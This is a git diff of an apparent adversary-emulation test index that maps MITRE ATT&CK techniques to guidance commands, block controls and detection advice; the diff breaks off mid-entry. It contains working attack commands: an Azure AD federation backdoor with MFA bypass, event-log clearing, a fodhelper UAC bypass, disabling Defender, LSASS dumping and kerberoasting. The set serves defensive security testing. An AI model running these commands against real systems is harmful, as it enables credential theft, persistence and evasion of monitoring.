+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device: 
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+  - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+  - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD 
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment.
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+  - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+  - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+  - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+  - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor 
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command 
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
+# Exfiltration
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. Generic: https://rclone.org/downloads/
+   2. MEGA: https://mega.io/desktop
+   3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+# Execution
+
+# Collection
+
diff --git a/fs-index-2024/fs-index-2024-v1.0-summary.csv b/fs-index-2024/fs-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..726da0f
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0-summary.csv
@@ -0,0 +1,51 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Attachment - Zipped macro","T1566.001","Initial Access","Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email."
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"External employee portal spray","T1110.003","Initial Access","Perform a password spray against an external employee login portal using a list of potential users and a single password"
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"Retrieve system information","T1082","Discovery","Retrieve information about the system using multiple builtin commands"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"C2 over Dropbox","T1102.002","Command and Control","Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
diff --git a/fs-index-2024/fs-index-2024-v1.0.yml b/fs-index-2024/fs-index-2024-v1.0.yml
new file mode 100644
index 0000000..9d2fecf
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0.yml
@@ -0,0 +1,1022 @@
+Initial Access:
+- name: Attachment - ISO
+  description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    isv: 1
+- name: Attachment - Zipped macro
+  description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 97f1da56-79a3-4181-a491-8de9f93b05af
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+    isv: 1
+- name: Prompt a user with multiple MFA requests
+  description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+  platforms:
+  guidance:
+  block:
+  - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+  detect:
+  - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+  controls:
+  - IdP
+  metadata:
+    id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    tid: T1621
+    tactic: TA0006
+    x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    isv: 1
+- name: External employee portal spray
+  description: Perform a password spray against an external employee login portal using a list of potential users and a single password
+  platforms:
+  guidance:
+  - Burp -> intruder
+  block:
+  - Portal protected with secure MFA solution
+  - IdP blocks bulk automated requests
+  detect:
+  - Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs
+  - Web application logs are ingested into the SIEM and alerts triggered for suspicious activity (e.g. brute force attacks, large number of 400/500 status codes)
+  controls:
+  - IdP
+  - SIEM
+  metadata:
+    id: 44fd7250-e613-441f-9cb6-5b98c2d71338
+    tid: T1110.003
+    tactic: TA0006
+    x_vectr_id: 44fd7250-e613-441f-9cb6-5b98c2d71338
+    isv: 1
+- name: Suspicious external employee login
+  description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+  platforms:
+  guidance:
+  block:
+  - Suspicious logins originating from select geolocations are blocked
+  detect:
+  - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  - IdP
+  metadata:
+    id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    isv: 1
+- name: Suspicious service use
+  description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  metadata:
+    id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    isv: 1
+Defense Evasion:
+- name: Clear Windows Event Log entries
+  description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+  platforms:
+  - windows
+  guidance:
+  - CMD> wevtutil clear-log Security
+  - CMD> wevtutil clear-log Application
+  - CMD> wevtutil clear-log System
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    tid: T1070.001
+    tactic: TA0005
+    x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    isv: 1
+- name: Load known-abusable kernel driver
+  description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+  platforms:
+  - windows
+  guidance:
+  - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+  block:
+  - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+  - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+  - https://www.loldrivers.io/
+  - Anomalous driver load blocked by endpoint security tool
+  detect:
+  - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+  controls:
+  - Hardening
+  - Endpoint Protection
+  metadata:
+    id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    tid: T1014
+    tactic: TA0005
+    x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    isv: 1
+- name: DLL execution using Rundll32
+  description: Execute a malicious DLL's function directly using rundll32
+  platforms:
+  - windows
+  guidance:
+  - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    tid: T1218.011
+    tactic: TA0005
+    x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+  description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+  - cmd> c:\windows\system32\fodhelper.exe
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    tid: T1548.002
+    tactic: TA0004
+    x_references:
+    - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+    x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    isv: 1
+- name: Sideload a DLL into a legitimate application
+  description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+  platforms:
+  - windows
+  guidance:
+  - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 2496e250-5757-482f-9661-daea872395ae
+    tid: T1574.002
+    tactic: TA0005
+    x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+    isv: 1
+- name: Disable Windows Defender via PowerShell
+  description: Use PowerShell's Set-MpPreference to disable Windows Defender
+  platforms:
+  - windows
+  guidance:
+  - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+  - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    tid: T1562.001
+    tactic: TA0005
+    x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    isv: 1
+- name: Modify identity policy in IdP
+  description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    tid: T1484
+    tactic: TA0003
+    x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+  description: Use nltest.exe to identify domain controllers in the domain
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /dclist:{{ domain }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    tid: T1018
+    tactic: TA0007
+    x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    isv: 1
+- name: Domain trust discovery via nltest
+  description: Identify domain trust relationships using nltest.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /domain_trusts /all_trusts
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    tid: T1482
+    tactic: TA0007
+    x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    isv: 1
+- name: Enumerate domain groups and users using net
+  description: Enumerate domain users and domain groups using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> net user /domain
+  - cmd> net group /domain
+  - cmd> net group "Domain Admins" /domain
+  - cmd> net group "Domain Computers" /domain
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    tid: T1087.002
+    tactic: TA0007
+    x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    isv: 1
+- name: BloodHound DC enumeration
+  description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+  platforms:
+  guidance:
+  - cmd> SharpHound.exe -c DcOnly
+  block:
+  - ''
+  detect:
+  - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+  - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+  - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: 672f8861-c914-4f58-b861-5107ce19f61c
+    tid: T1087.002
+    tactic: TA0007
+    x_tools:
+    - https://github.com/BloodHoundAD/SharpHound
+    x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+    isv: 1
+- name: Internal network scan using Net Scan
+  description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+  platforms:
+  - windows
+  guidance:
+  - cmd> {{ netscan_binary }}
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+  controls:
+  - ID/PS
+  - Firewall
+  - SIEM
+  - Application Control
+  metadata:
+    id: 3f120c23-78c0-462f-808f-38ef4f607233
+    tid: T1046
+    tactic: TA0007
+    x_tools:
+    - https://www.softperfect.com/products/networkscanner/
+    x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+    isv: 1
+- name: Retrieve system information
+  description: Retrieve information about the system using multiple builtin commands
+  platforms:
+  - windows
+  guidance:
+  - CMD> systeminfo ipconfig tasklist sc query wmic product get
+  block:
+  - ''
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9064e91a-be78-48a5-9112-28d5701d6d51
+    tid: T1082
+    tactic: TA0007
+    x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+    isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    isv: 1
+- name: HTTPS C2 over tcp/443
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    isv: 1
+- name: Access via remote assistance tool
+  description: Establish connection to system using a legitimate remote assistance application
+  platforms:
+  guidance:
+  block:
+  - Block the installation and use of unapproved third-party utilities via application control software
+  - Connections to known remote access service domains/IPs are blocked
+  - Remote access connection attempts originating from users outside of the tenant are blocked
+  detect:
+  - Connections to known remote access service domains/IPs are detected
+  controls:
+  - Application Control
+  - ID/PS
+  - Firewall
+  metadata:
+    id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    tid: T1219
+    tactic: TA0011
+    x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    isv: 1
+- name: Remote tool download over HTTP
+  description: Download a tool from a public hosting location onto the victim system
+  platforms:
+  guidance:
+  block:
+  - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+  detect:
+  - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    tid: T1105
+    tactic: TA0011
+    x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    isv: 1
+- name: C2 over Dropbox
+  description: Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic.
+  platforms:
+  guidance:
+  block:
+  - C2 channel using legitimate service is blocked by proxy, firewall, or network behavioral/UEBA tool
+  - Connection to legitimate service that falls outside standard business operations blocked based on domain and/or domain categorization
+  detect:
+  - C2 channel using legitimate service is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+    tid: T1102.002
+    tactic: TA0011
+    x_references:
+    - https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online
+    x_vectr_id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+    isv: 1
+Credential Access:
+- name: Extract Logonpasswords via Nanodump
+  description: Use nanodump to extract credentials from LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> nanodump.exe --duplicate -w {{ out_file }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+  description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+  platforms:
+  - windows
+  guidance:
+  - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+  description: Use ProcDump from Sysinternals to dump LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - CMD> procdump -ma lsass.exe dump
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  - Application Control
+  metadata:
+    id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    tid: T1003.001
+    tactic: TA0006
+    x_tools:
+    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+    x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    isv: 1
+- name: Volumetric Kerberoasting
+  description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+  platforms:
+  guidance:
+  - cmd> Rubeus.exe kerberoast
+  block:
+  - ''
+  detect:
